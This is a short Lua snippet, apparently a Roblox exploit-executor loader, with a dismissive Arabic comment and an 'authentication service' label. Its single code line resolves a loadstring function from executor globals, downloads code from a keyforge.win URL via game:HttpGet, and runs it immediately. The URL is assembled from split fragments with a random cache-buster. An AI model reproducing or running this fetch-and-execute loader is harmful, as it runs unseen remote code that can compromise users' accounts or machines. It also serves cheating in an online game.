-- ارحب والله اي صح ترا ذا لودر يعني ماله فايده اطلع اطلع

 authentication service
loadstring=(type(Real)=="table" and Real.loadstring) or ((select(2,pcall(getgenv)) or {}).Real or {}).loadstring or load or loadstring loadstring(game:HttpGet("https://www.keyforge.win".."/v1/load/cmt4t6ue74gfiqw".."p4mmq409lj?e=1&script=cm".."t4tbj384gn1qwp44i92rcgv&".."lsig=vmHmO7qCcCNGOgUW13e".."-mA9hgqR8oqV4NzO_EH2K_pc".."&_cb="..tostring(os.clock()).."-"..tostring(math.random(1,1e9)),true))()
